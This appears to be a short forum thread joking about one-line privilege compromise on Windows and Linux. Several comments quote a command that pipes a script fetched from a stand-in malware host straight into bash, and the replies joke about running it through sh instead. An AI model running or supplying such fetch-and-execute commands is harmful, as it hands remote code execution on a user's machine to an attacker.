Comment by justsomehnguy

Comment by justsomehnguy 7 hours ago

3 replies

> Problem number 3, Windows still let you root a machine by 1 line in powershell? What the @$$%&%&#$?

sigh It needs to be run under an account with admin privileges for that. The shield on the "Run" dialog screenshot clearly indicates what it was taken under a user with admin privileges and UAC disabled.

Come on, now cry what Linux still let you root a machine by 1 line in curl malware.zyx/evilscript | bash.

koolba 6 hours ago

> … by 1 like in curl malware.zyx/evilscript | bash.

Making the script POSIX compliant would allow hacking computers without bash. Then you can pipe it into just “sh” which is guaranteed to be on the PATH.

rl3 6 hours ago

>Come on, now cry what Linux still let you root a machine by 1 line in curl malware.zyx/evilscript | bash.

Excuse me, but some of us prefer to let evil scripts root our machines via pure sh, thank you very much.

  • koolba 6 hours ago

    Glad I’m not the only one thinking about POSIX compliance!